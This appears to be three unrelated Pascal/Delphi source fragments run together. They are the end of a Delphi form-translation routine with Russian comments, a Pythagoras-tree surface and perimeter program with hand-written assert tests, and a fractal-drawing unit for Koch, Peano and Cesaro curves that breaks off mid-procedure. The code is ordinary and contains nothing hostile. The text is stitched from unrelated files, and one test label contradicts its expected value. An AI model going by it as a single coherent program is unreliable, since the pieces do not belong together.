end; end else {Все остальные контролы} begin {найти компонент по имени} Comp := FindComponent(Parser.ControlName); {заголовок формы} if Parser.IsFormCaption and not Parser.IsBaseRef then begin if Parser.FormName = 'MAINFORM' then begin TMainForm(Self).FMainCaption := Parser.PropText; TMainForm(Self).SetCaption(MAIN_ORG.Name); end else Caption := Parser.PropText; end; {если компонент найден, проверить наличие нужного свойства и изменить его } if Assigned(Comp) then if HasProperty(Comp,Parser.PropName) then SetProperty(Comp,Parser.PropName,Parser.PropText); end; end; end; CloseFile(F); StartLog(ClassName+' end translate ... '+Formatdatetime('hh:mm:ss zzz',now)); StartLog('-------------------------------------------'); except end; end; initialization RegisterClass(TDBGridEh); end.
PROGRAM PythTree; FUNCTION Power(x: REAL; n: INTEGER): REAL; VAR result: REAL; BEGIN result := x; if n = 1 then result := x else if n = 0 then result := 1 else BEGIN result := result * Power(x, n-1); END; Power := result; END; FUNCTION CalculateSurface(sideLength: REAL; iterations: INTEGER): REAL; VAR area: REAL; BEGIN area := sideLength * sideLength; IF iterations = 0 THEN CalculateSurface := area ELSE area := area + (2 * CalculateSurface((sqrt(2) / 2) * sideLength, iterations - 1)); CalculateSurface := area; END; FUNCTION CalculateSurfaceIter(sideLength: REAL; iterations: INTEGER): REAL; VAR area: REAL; currentIteration: INTEGER; BEGIN area := sideLength * sideLength; currentIteration := 1; WHILE currentIteration <= iterations DO BEGIN sideLength := (sqrt(2) / 2) * sideLength; area := area + (Power(2, currentIteration) * sideLength * sideLength); INC(currentIteration); END; CalculateSurfaceIter := area; END; FUNCTION CalculatePerimeter(sideLength: REAL; iterations: INTEGER; currentIteration: INTEGER): REAL; VAR perimeter: REAL; BEGIN perimeter := 2 * sideLength * Power(2, currentIteration); IF currentIteration = iterations THEN BEGIN perimeter := perimeter + (sideLength * Power(2, currentIteration)); perimeter := perimeter + sqrt((sideLength * sideLength * Power(2, currentIteration))); END ELSE BEGIN perimeter := perimeter + CalculatePerimeter((sqrt(2) / 2) * sideLength, iterations, currentIteration + 1); END; CalculatePerimeter := perimeter; END; FUNCTION CalculatePerimeterIter(sideLength: REAL; iterations: INTEGER; currentIteration: INTEGER): REAL; VAR perimeter: REAL; BEGIN perimeter := 3 * sideLength; WHILE currentIteration < iterations DO BEGIN INC(currentIteration); sideLength := (sqrt(2) / 2) * sideLength; perimeter := perimeter + ( 2 * sideLength * Power(2, currentIteration)); END; CalculatePerimeterIter := perimeter + (sideLength * Power(2, currentIteration)); END; {* ----------- Assert Methods ----------- *} FUNCTION AssertTrue(bool: BOOLEAN): STRING; BEGIN AssertTrue := 'X'; IF bool THEN AssertTrue := 'OK' END; FUNCTION AssertFalse(bool: BOOLEAN): STRING; BEGIN AssertFalse := 'X'; IF not bool THEN AssertFalse := 'OK' END; FUNCTION AssertPower(x: REAL; n: INTEGER; expectedResult: REAL): BOOLEAN; BEGIN AssertPower := (Power(x, n) = expectedResult); END; FUNCTION AssertCalculateSurface(sideLength: REAL; iterations: INTEGER; expectedResult: REAL): BOOLEAN; BEGIN AssertCalculateSurface := ( CalculateSurface(sideLength, iterations) = expectedResult ); END; FUNCTION AssertCalculateSurfaceIter(sideLength: REAL; iterations: INTEGER; expectedResult: REAL): BOOLEAN; BEGIN AssertCalculateSurfaceIter := ( CalculateSurfaceIter(sideLength, iterations) = expectedResult ); END; FUNCTION AssertCalculatePerimeter(sideLength: REAL; iterations: INTEGER; expectedResult: REAL): BOOLEAN; BEGIN AssertCalculatePerimeter := (CalculatePerimeter(sideLength, iterations, 0) = expectedResult); END; FUNCTION AssertCalculatePerimeterIter(sideLength: REAL; iterations: INTEGER; expectedResult: REAL): BOOLEAN; BEGIN AssertCalculatePerimeterIter := (CalculatePerimeterIter(sideLength, iterations, 0) = expectedResult); END; VAR erg3, erg2, erg4: REAL; a, b, c, d, e, f: REAL; BEGIN WriteLn('Test Power (Recursive)'); WriteLn('Power(2, 3, 8) -> ', AssertTrue(AssertPower(2, 3, 8))); WriteLn('Power(-2, 3, -8) -> ', AssertTrue(AssertPower(-2, 3, -8))); WriteLn('Power(0, 1, 0) -> ', AssertTrue(AssertPower(0, 1, 0))); WriteLn('Power(5, 1, 5) -> ', AssertTrue(AssertPower(5, 1, 5))); WriteLn('Power(5, 0, 1) -> ', AssertTrue(AssertPower(5, 0, 1))); WriteLn('Power(1.5 ,2, 2.25) -> ', AssertTrue(AssertPower(1.5, 2, 2.25))); WriteLn('Power(0, 0, 1) -> ', AssertTrue(AssertPower(0, 0, 1))); WriteLn; WriteLn('Test CalculateSurface'); WriteLn('AssertCalculateSurface(2, 2, 12) -> ', AssertTrue(AssertCalculateSurface(2, 2, 12))); WriteLn('AssertCalculateSurface(2, 5, 24) -> ', AssertTrue(AssertCalculateSurface(2, 5, 24))); WriteLn('AssertCalculateSurface(2, 100, 404) -> ', AssertTrue(AssertCalculateSurface(2, 100, 404))); WriteLn('AssertCalculateSurface(5, 16, 425) -> ', AssertTrue(AssertCalculateSurface(5, 16, 425))); WriteLn('AssertCalculateSurface(0, 0, 0) -> ', AssertTrue(AssertCalculateSurface(0, 0, 0))); WriteLn('AssertCalculateSurface(0, 5, 0) -> ', AssertTrue(AssertCalculateSurface(0, 5, 0))); WriteLn('AssertCalculateSurface(5, 0, 25) -> ', AssertTrue(AssertCalculateSurface(5, 0, 25))); WriteLn; WriteLn('Test CalculateSurfaceIter'); WriteLn('AssertCalculateSurfaceIter(2, 2, 12) -> ', AssertTrue(AssertCalculateSurfaceIter(2, 2, 12))); WriteLn('AssertCalculateSurfaceIter(2, 5, 24) -> ', AssertTrue(AssertCalculateSurfaceIter(2, 5, 24))); WriteLn('AssertCalculateSurfaceIter(2, 100, 404) -> ', AssertTrue(AssertCalculateSurfaceIter(2, 100, 404))); WriteLn('AssertCalculateSurfaceIter(5, 16, 425) -> ', AssertTrue(AssertCalculateSurfaceIter(5, 16, 425))); WriteLn('AssertCalculateSurfaceIter(0, 0, 0) -> ', AssertTrue(AssertCalculateSurfaceIter(0, 0, 0))); WriteLn('AssertCalculateSurfaceIter(0, 5, 0) -> ', AssertTrue(AssertCalculateSurfaceIter(0, 5, 0))); WriteLn('AssertCalculateSurfaceIter(5, 0, 25) -> ', AssertTrue(AssertCalculateSurfaceIter(5, 0, 25))); WriteLn; WriteLn('Test CalculatePerimeter'); WriteLn('AssertCalculatePerimeter(2, 2, 2.3656854249492380E+001) -> ', AssertTrue(AssertCalculatePerimeter(2, 2, 2.3656854249492380E+001))); WriteLn('AssertCalculatePerimeter(2, 3, 3.6627416997969526E+001) -> ', AssertTrue(AssertCalculatePerimeter(2, 3, 3.6627416997969526E+001))); WriteLn('AssertCalculatePerimeter(5, 10, 1.2334062043356594E+003) -> ', AssertTrue(AssertCalculatePerimeter(5, 10, 1.2334062043356594E+003))); WriteLn('AssertCalculatePerimeter(0, 0, 0) -> ', AssertTrue(AssertCalculatePerimeter(0, 0, 0))); WriteLn('AssertCalculatePerimeter(0, 5, 0) -> ', AssertTrue(AssertCalculatePerimeter(0, 5, 0))); WriteLn('AssertCalculatePerimeter(5, 0, 0) -> ', AssertTrue(AssertCalculatePerimeter(5, 0, 20))); WriteLn('AssertCalculatePerimeter(5, 100, 4.4070126852380008E+016) -> ', AssertTrue(AssertCalculatePerimeter(5, 100, 4.4070126852380008E+016))); WriteLn; WriteLn('Test CalculatePerimeterIter'); WriteLn('AssertCalculatePerimeterIter(2, 2, 2.3656854249492380E+001) -> ', AssertTrue(AssertCalculatePerimeterIter(2, 2, 2.3656854249492380E+001))); WriteLn('AssertCalculatePerimeterIter(2, 3, 3.6627416997969526E+001) -> ', AssertTrue(AssertCalculatePerimeterIter(2, 3, 3.6627416997969526E+001))); WriteLn('AssertCalculatePerimeterIter(5, 10, 1.2334062043356594E+003) -> ', AssertTrue(AssertCalculatePerimeterIter(5, 10, 1.2334062043356594E+003))); WriteLn('AssertCalculatePerimeterIter(0, 0, 0) -> ', AssertTrue(AssertCalculatePerimeterIter(0, 0, 0))); WriteLn('AssertCalculatePerimeterIter(0, 5, 0) -> ', AssertTrue(AssertCalculatePerimeterIter(0, 5, 0))); WriteLn('AssertCalculatePerimeterIter(5, 0, 0) -> ', AssertTrue(AssertCalculatePerimeterIter(5, 0, 20))); // TODO: Wagner fragen ob bei ihm auch ungenauigkeit ein problem ist WriteLn('AssertCalculatePerimeterIter(5, 100, 4.4070126852380008E+016) -> ', AssertTrue(AssertCalculatePerimeterIter(5, 100, 4.4070126852380008E+016))); WriteLn; a := 2; b := sqrt(2) / 2 * a; c := sqrt(2) / 2 * b; d := sqrt(2) / 2 * c; e := sqrt(2) / 2 * d; f := sqrt(2) / 2 * e; // WriteLn('Surface'); // WriteLn(Power(2, 10)); // WriteLn(CalculateSurface(99, 100)); // WriteLn(CalculateSurfaceIter(99, 100)); // erg2 := a * a + b * b * 2 + c * c * 4; // WriteLn(erg2); // erg2 := 3 * a + 4 * b + 12 * c; // erg3 := 3 * a + 4 * b + 8 * c + 24 * d; // erg4 := 3 * a + 4 * b + 8 * c + 16 * d + 48 * e; // WriteLn('Perimeter:'); // WriteLn('Recursive: ', CalculatePerimeter(3, 44, 0)); // WriteLn('Iter: ', CalculatePerimeterIter(3, 44, 0)); // WriteLn; // WriteLn(erg2); // WriteLn(erg3); // WriteLn(erg4) END.
{*******************************************************} { } { Tachyon Unit } { Vector Raster Geographic Information Synthesis } { VOICE .. Tracer } { GRIP ICE .. Tongs } { Digital Terrain Mapping } { Image Locatable Holographics } { SOS MAP } { Surreal Object Synthesis Multimedia Analysis Product } { Fractal3D Life MOW } { Copyright (c) 1995,2006 Ivan Lee Herring } { } {*******************************************************} unit fuMathC; interface uses Windows, Messages, SysUtils, Dialogs, Forms, Graphics, Classes; procedure qkoch3(level: integer); procedure Peanoor(level: integer); procedure Peanomod(level: integer); procedure Cesaro(level: integer); procedure CesaroMD(level: integer); procedure Cesaro2(level: integer); procedure polya(level: integer); procedure PGosper(Level: Integer); procedure snow7(level: integer); procedure snowhall(level: integer); procedure snow13(level: integer); procedure Snoflake(level: integer); procedure Gosper(level: integer); procedure hkoch8(level: integer); procedure qkoch8(level: integer); procedure qkoch18(level: integer); procedure qkoch32(level: integer); procedure qkoch50(level: integer); procedure hilbert(level: integer); procedure hilbert2(level: integer); procedure hil3d(level: integer); procedure sierp(level: integer); { of 8 } procedure sierbox(level: integer); { of 3 } procedure siergask(level: integer); { fast enough at all 5 levels } procedure Dragon_Curve(level: integer); procedure TwinDrag(level: integer); implementation uses fUGlobal,fMain, fGMath; var turtle_r, turtle_x, turtle_y, turtle_theta: Extended; function point(x1: real; y_one: real; x2: real; y2: Extended): Extended; var theta: Extended; begin if (x2 - x1) = 0 then if y2 > y_one then theta := 90 else theta := 270 else theta := arctan((y2 - y_one) / (x2 - x1)) * 57.295779; if x1 > x2 then theta := theta + 180; point := theta; end; procedure step; begin turtle_x := turtle_x + turtle_r * cos(turtle_theta * 0.017453292); turtle_y := turtle_y + turtle_r * sin(turtle_theta * 0.017453292); end; procedure turn(angle: Extended); begin turtle_theta := turtle_theta + angle; end; function IStringer(I: Longint): string; { Convert any integer type to a string } var S: string[11]; begin Str(I, S); Result := S; end; procedure qkoch3(level: integer); var TempColor: TColor; maxcolx, maxrowy, {GfColor, } lc, i, generator_size, init_size: integer; initiator_x1, initiator_x2, initiator_y1, initiator_y2 : array[0..9] of Extended; procedure generate (X1: Extended; Y1: Extended; X2: Extended; Y2: Extended; level: integer); var j, k: integer; Xpoints, Ypoints: array[0..24] of Extended; begin dec(level); turtle_r := sqrt(((X2 - X1) * (X2 - X1) + (Y2 - Y1) * (Y2 - Y1)) / 5.0); Xpoints[0] := X1; Ypoints[0] := Y1; Xpoints[3] := X2; Ypoints[3] := Y2; turtle_theta := point(X1, Y1, X2, Y2); turtle_x := X1; turtle_y := Y1; turn(26.56); step; Xpoints[1] := turtle_x; Ypoints[1] := turtle_y; turn(-90); step; Xpoints[2] := turtle_x; Ypoints[2] := turtle_y; if level > 0 then begin for j := 0 to generator_size - 1 do begin X1 := Xpoints[j]; X2 := Xpoints[j + 1]; Y1 := Ypoints[j]; Y2 := Ypoints[j + 1]; generate(X1, Y1, X2, Y2, level); end; end else begin for k := 0 to generator_size - 1 do begin MainForm.Image2.Canvas.Moveto(Round(Xpoints[k] + 320), Round(240 - Ypoints[k])); MainForm.Image2.Canvas.Lineto(Round(Xpoints[k + 1] + 320), Round(240 - Ypoints[k + 1])); end; end; end; begin {gfcolor:=4; } generator_size := 3; init_size := 4; initiator_x1[0] := -130; initiator_x1[1] := 130; initiator_x1[2] := 130; initiator_x1[3] := -130; initiator_x2[0] := 130; initiator_x2[1] := 130; initiator_x2[2] := -130; initiator_x2[3] := -130; initiator_y1[0] := 130; initiator_y1[1] := 130; initiator_y1[2] := -130; initiator_y1[3] := -130; initiator_y2[0] := 130; initiator_y2[1] := -130; initiator_y2[2] := -130; initiator_y2[3] := 130; if level < 0 then level := 0 else if level > 8 then level := 8; if Level > 0 then begin with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; {MainForm.Show;} for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level); end; Textout(10, 10, 'Von Koch 3' + ' Level: ' + IStringer(Level)); end; end else begin for lc := 1 to 4 do begin level := lc; with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; {MainForm.Show;} for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level); end; TextOut(10, 10, 'Von Koch 3' + ' Level: ' + IStringer(Level)); {inc(GFColor);} bRotateImage := False; {in the Drawing...} bRotatingImage := True; repeat Application.ProcessMessages until (bRotateImage = True); end; end; end; end; (* of qkoch3 *) procedure peanoor(level: integer); var TempColor: TColor; Gfcolor, maxcolx, maxrowy, lc, {lcc,counter,} i, generator_size, init_size: integer; { Xpoints, Ypoints: array[0..24] of Extended; } initiator_x1, initiator_x2, initiator_y1, initiator_y2: array[0..9] of Extended; procedure generate(X1: Extended; Y1: Extended; X2: Extended; Y2: Extended; level: integer); var j, k: integer; { a, b: Extended; } Xpoints, Ypoints: array[0..24] of Extended; begin dec(level); turtle_r := (sqrt((X2 - X1) * (X2 - X1) + (Y2 - Y1) * (Y2 - Y1))) / 3.0; Xpoints[0] := X1; Ypoints[0] := Y1; Xpoints[9] := X2; Ypoints[9] := Y2; turtle_theta := point(X1, Y1, X2, Y2); turtle_x := X1; turtle_y := Y1; step; Xpoints[1] := turtle_x; Ypoints[1] := turtle_y; turn(90); step; Xpoints[2] := turtle_x; Ypoints[2] := turtle_y; turn(-90); step; Xpoints[3] := turtle_x; Ypoints[3] := turtle_y; turn(-90); step; Xpoints[4] := turtle_x; Ypoints[4] := turtle_y; turn(-90); step; Xpoints[5] := turtle_x; Ypoints[5] := turtle_y; turn(90); step; Xpoints[6] := turtle_x; Ypoints[6] := turtle_y; turn(90); step; Xpoints[7] := turtle_x; Ypoints[7] := turtle_y; turn(90); step; Xpoints[8] := turtle_x; Ypoints[8] := turtle_y; if level > 0 then begin for j := 0 to generator_size - 1 do begin X1 := Xpoints[j]; X2 := Xpoints[j + 1]; Y1 := Ypoints[j]; Y2 := Ypoints[j + 1]; generate(X1, Y1, X2, Y2, level); end; end else begin for k := 0 to generator_size - 1 do begin {*0.729} TempColor := RGB(RGBArray[0, GfColor], RGBArray[1, GfColor], RGBArray[2, GfColor]); MainForm.Image2.Canvas.Moveto(Round(Xpoints[k] + 320), Round(240 - Ypoints[k])); MainForm.Image2.Canvas.LineTo(Round(Xpoints[k + 1] + 320), Round(240 - Ypoints[k + 1])); end; end; end; begin GfColor := 4; generator_size := 9; init_size := 1; initiator_x1[0] := 0; initiator_x2[0] := 0; initiator_y1[0] := -200; {-100} initiator_y2[0] := 200; {100} if level < 0 then level := 0 else if level > 8 then level := 8; if Level > 0 then begin with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level {GfColor}], RGBArray[1, Level {GfColor}], RGBArray[2, Level {GfColor}]); Pen.Color := TempColor; Font.Color := TempColor; TextOut(10, 10, 'Peano' + ' Level: ' + IStringer(Level)); MainForm.Show; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level); end; end; end else begin MainForm.Show; with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); for lc := 1 to 4 do begin level := lc; Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, GfColor], RGBArray[1, GfColor], RGBArray[2, GfColor]); Pen.Color := TempColor; Font.Color := TempColor; TextOut(10, 10, 'Peano' + ' Level: ' + IStringer(Level)); for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level); end; inc(GFColor); bRotateImage := False; {in the Drawing...} bRotatingImage := True; repeat Application.ProcessMessages until (bRotateImage = True); end; end; end; end; procedure peanomod(level: integer); var TempColor: TColor; Gfcolor, maxcolx, maxrowy, lc, {lcc,counter,} i, generator_size, init_size: integer; Xptemp, Yptemp: Extended; { Xpoints, Ypoints: array[0..24] of Extended; } initiator_x1, initiator_x2, initiator_y1, initiator_y2: array[0..9] of Extended; procedure generate(X1: Extended; Y1: Extended; X2: Extended; Y2: Extended; level: integer); var j, k: integer; { a, b: Extended;} Xpoints, Ypoints: array[0..24] of Extended; begin dec(level); Xpoints[0] := X1; Ypoints[0] := Y1; turtle_theta := point(X1, Y1, X2, Y2); turtle_x := X1; turtle_y := Y1; if level <> 0 then begin turtle_r := (sqrt((X2 - X1) * (X2 - X1) + (Y2 - Y1) * (Y2 - Y1))) / 3.0; Xpoints[9] := X2; Ypoints[9] := Y2; step; Xpoints[1] := turtle_x; Ypoints[1] := turtle_y; turn(90); step; Xpoints[2] := turtle_x; Ypoints[2] := turtle_y; turn(-90); step; Xpoints[3] := turtle_x; Ypoints[3] := turtle_y; turn(-90); step; Xpoints[4] := turtle_x; Ypoints[4] := turtle_y; turn(-90); step; Xpoints[5] := turtle_x; Ypoints[5] := turtle_y; turn(90); step; Xpoints[6] := turtle_x; Ypoints[6] := turtle_y; turn(90); step; Xpoints[7] := turtle_x; Ypoints[7] := turtle_y; turn(90); step; Xpoints[8] := turtle_x; Ypoints[8] := turtle_y; for j := 0 to 8 do begin X1 := Xpoints[j]; X2 := Xpoints[j + 1]; Y1 := Ypoints[j]; Y2 := Ypoints[j + 1]; generate(X1, Y1, X2, Y2, level); end; end else begin turtle_r := (sqrt((X2 - X1) * (X2 - X1) + (Y2 - Y1) * (Y2 - Y1))) / 18.0; Xpoints[0] := Xptemp; Ypoints[0] := Yptemp; Xpoints[19] := X2; Ypoints[19] := Y2; step; Xpoints[1] := turtle_x; Ypoints[1] := turtle_y; step; step; step; Xpoints[2] := turtle_x; Ypoints[2] := turtle_y; step; turn(90); step; Xpoints[3] := turtle_x; Ypoints[3] := turtle_y; step; step; step; step; Xpoints[4] := turtle_x; Ypoints[4] := turtle_y; step; turn(-90); step; Xpoints[5] := turtle_x; Ypoints[5] := turtle_y; step; step; step; step; Xpoints[6] := turtle_x; Ypoints[6] := turtle_y; step; turn(-90); step; Xpoints[7] := turtle_x; Ypoints[7] := turtle_y; step; step; step; step; Xpoints[8] := turtle_x; Ypoints[8] := turtle_y; step; turn(-90); step; Xpoints[9] := turtle_x; Ypoints[9] := turtle_y; step; step; step; step; Xpoints[10] := turtle_x; Ypoints[10] := turtle_y; step; turn(90); step; Xpoints[11] := turtle_x; Ypoints[11] := turtle_y; step; step; step; step; Xpoints[12] := turtle_x; Ypoints[12] := turtle_y; step; turn(90); step; Xpoints[13] := turtle_x; Ypoints[13] := turtle_y; step; step; step; step; Xpoints[14] := turtle_x; Ypoints[14] := turtle_y; step; turn(90); step; Xpoints[15] := turtle_x; Ypoints[15] := turtle_y; step; step; step; step; Xpoints[16] := turtle_x; Ypoints[16] := turtle_y; step; turn(-90); step; Xpoints[17] := turtle_x; Ypoints[17] := turtle_y; step; step; step; step; Xpoints[18] := turtle_x; Ypoints[18] := turtle_y; Xptemp := Xpoints[18]; Yptemp := Ypoints[18]; for k := 0 to generator_size - 2 do begin TempColor := RGB(RGBArray[0, GfColor], RGBArray[1, GfColor], RGBArray[2, GfColor]); MainForm.Image2.Canvas.Moveto(Round(Xpoints[k] + 320), Round(240 - Ypoints[k])); MainForm.Image2.Canvas.LineTo(Round(Xpoints[k + 1] + 320), Round(240 - Ypoints[k + 1])); end; end; end; begin GfColor := 1; generator_size := 19; init_size := 1; initiator_x1[0] := 0; initiator_x2[0] := 0; initiator_y1[0] := -200; initiator_y2[0] := 200; if level < 0 then level := 0 else if level > 8 then level := 8; if Level > 0 then begin with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; MainForm.Show; if Level = 1 then Level := 2; TextOut(10, 10, 'Peano Modified' + ' Level: ' + IStringer(Level)); Xptemp := initiator_x1[0]; Yptemp := initiator_y1[0]; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level); end; end; end else begin for lc := 2 to 5 do begin level := lc; with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; TextOut(10, 10, 'Peano Modified' + ' Level: ' + IStringer(Level)); MainForm.Show; Xptemp := initiator_x1[0]; Yptemp := initiator_y1[0]; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level); end; inc(GFColor); bRotateImage := False; {in the Drawing...} bRotatingImage := True; repeat Application.ProcessMessages until (bRotateImage = True); end; end; end; end; procedure cesaro(level: integer); var TempColor: TColor; Gfcolor, maxcolx, maxrowy, lc, {lcc,counter,} sign1, i, generator_size, init_size: integer; { Xpoints, Ypoints: array[0..24] of extended;} initiator_x1, initiator_x2, initiator_y1, initiator_y2: array[0..9] of extended; sign: array[0..15] of integer; procedure generate(X1: Extended; Y1: Extended; X2: Extended; Y2: Extended; level: integer); var j {,k}: integer; { a, b: extended; } Xpoints, Ypoints: array[0..24] of extended; begin dec(level); turtle_r := sqrt((X2 - X1) * (X2 - X1) + (Y2 - Y1) * (Y2 - Y1)) / 2.0; Xpoints[0] := X1; Ypoints[0] := Y1; Xpoints[2] := X2; Ypoints[2] := Y2; turtle_theta := point(X1, Y1, X2, Y2); turtle_x := X1; turtle_y := Y1; step; Xpoints[3] := turtle_x; Ypoints[3] := turtle_y; turn(90 * sign[level]); step; Xpoints[1] := turtle_x; Ypoints[1] := turtle_y; if level > 0 then begin for j := 0 to generator_size - 2 do begin X1 := Xpoints[j]; X2 := Xpoints[j + 1]; Y1 := Ypoints[j]; Y2 := Ypoints[j + 1]; generate(X1, Y1, X2, Y2, level); end; end else begin MainForm.Image2.Canvas.Moveto(Round(Xpoints[0] + 320), Round(240 - Ypoints[0])); MainForm.Image2.Canvas.Lineto(Round(Xpoints[2] + 320), Round(240 - Ypoints[2])); MainForm.Image2.Canvas.Moveto(Round(Xpoints[1] + 320), Round(240 - Ypoints[1])); MainForm.Image2.Canvas.Lineto(Round(Xpoints[3] + 320), Round(240 - Ypoints[3])); end; end; begin GfColor := 4; generator_size := 3; init_size := 1; initiator_x1[0] := -200; {-150} initiator_x2[0] := 200; {150} initiator_y1[0] := -50; {0} initiator_y2[0] := -50; {0} if level < 0 then level := 0 else if level > 8 then level := 8; if LEvel > 0 then begin level := 2 * level; { this was a 16 level dodad } MainForm.Show; with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, GfColor], RGBArray[1, GfColor], RGBArray[2, GfColor]); Pen.Color := TempColor; Font.Color := TempColor; TextOut(10, 10, 'Cesaro' + ' Level: ' + IStringer(Level)); sign1 := -1; for i := level downto 0 do begin sign[i] := sign1; sign1 := -sign1; end; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level); end; end; end else begin for lc := 1 to 4 do begin level := lc * 2; { this was a 16 level dodad } with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, GfColor], RGBArray[1, GfColor], RGBArray[2, GfColor]); Pen.Color := TempColor; Font.Color := TempColor; TextOut(10, 10, 'Cesaro' + ' Level: ' + IStringer(Level)); MainForm.Show; sign1 := -1; for i := level downto 0 do begin sign[i] := sign1; sign1 := -sign1; end; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level); end; inc(GFColor); end; end; end; end; { of Cesaro } procedure CesaroMD(level: integer); var TempColor: TColor; maxcolx, maxrowy, GfColor, lc, {lcc,counter, } sign1, i, generator_size, init_size: integer; { Xpoints, Ypoints: array[0..24] of Extended;} initiator_x1, initiator_x2, initiator_y1, initiator_y2: array[0..9] of Extended; sign: array[0..15] of integer; procedure generate(X1: Extended; Y1: Extended; X2: Extended; Y2: Extended; level: integer); var j {,k}: integer; a, b: Extended; Xpoints, Ypoints: array[0..24] of Extended; begin dec(level); a := sqrt((X2 - X1) * (X2 - X1) + (Y2 - Y1) * (Y2 - Y1)) / 2.0; b := a * 0.9128442; turtle_r := b; Xpoints[0] := X1; Ypoints[0] := Y1; Xpoints[2] := X2; Ypoints[2] := Y2; turtle_theta := point(X1, Y1, X2, Y2); turtle_x := X1; turtle_y := Y1; step; Xpoints[3] := turtle_x; Ypoints[3] := turtle_y; turn(85 * sign[level]); turtle_r := a; step; Xpoints[1] := turtle_x; Ypoints[1] := turtle_y; turn(-170 * sign[level]); step; Xpoints[4] := turtle_x; Ypoints[4] := turtle_y; if level > 0 then begin for j := 0 to generator_size - 2 do begin X1 := Xpoints[j]; X2 := Xpoints[j + 1]; Y1 := Ypoints[j]; Y2 := Ypoints[j + 1]; generate(X1, Y1, X2, Y2, level); end; end else begin MainForm.Image2.Canvas.Moveto(Round(Xpoints[0] + 320), Round(240 - Ypoints[0])); MainForm.Image2.Canvas.Lineto(Round(Xpoints[3] + 320), Round(240 - Ypoints[3])); MainForm.Image2.Canvas.Moveto(Round(Xpoints[2] + 320), Round(240 - Ypoints[2])); MainForm.Image2.Canvas.Lineto(Round(Xpoints[4] + 320), Round(240 - Ypoints[4])); MainForm.Image2.Canvas.Moveto(Round(Xpoints[3] + 320), Round(240 - Ypoints[3])); MainForm.Image2.Canvas.Lineto(Round(Xpoints[1] + 320), Round(240 - Ypoints[1])); MainForm.Image2.Canvas.Moveto(Round(Xpoints[4] + 320), Round(240 - Ypoints[4])); MainForm.Image2.Canvas.Lineto(Round(Xpoints[1] + 320), Round(240 - Ypoints[1])); end; end; begin GfColor := 4; generator_size := 3; init_size := 1; initiator_x1[0] := -200; {-150} initiator_x2[0] := 200; {150} initiator_y1[0] := -50; {0} initiator_y2[0] := -50; {0} if level < 0 then level := 0 else if level > 8 then level := 8; if LEvel > 0 then begin level := 2 * level; { this was 16 levels } with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, GfColor], RGBArray[1, GfColor], RGBArray[2, GfColor]); Pen.Color := TempColor; Font.Color := TempColor; TextOut(10, 10, 'Cesaro MD' + ' Level: ' + IStringer(Level)); MainForm.Show; sign1 := -1; for i := level downto 0 do begin sign[i] := sign1; sign1 := -sign1; end; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level); end; end; end else begin for lc := 1 to 4 do begin level := lc * 2; { this was 16 levels } with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, GfColor], RGBArray[1, GfColor], RGBArray[2, GfColor]); Pen.Color := TempColor; Font.Color := TempColor; TextOut(10, 10, 'Cesaro MD' + ' Level: ' + IStringer(Level)); MainForm.Show; sign1 := -1; for i := level downto 0 do begin 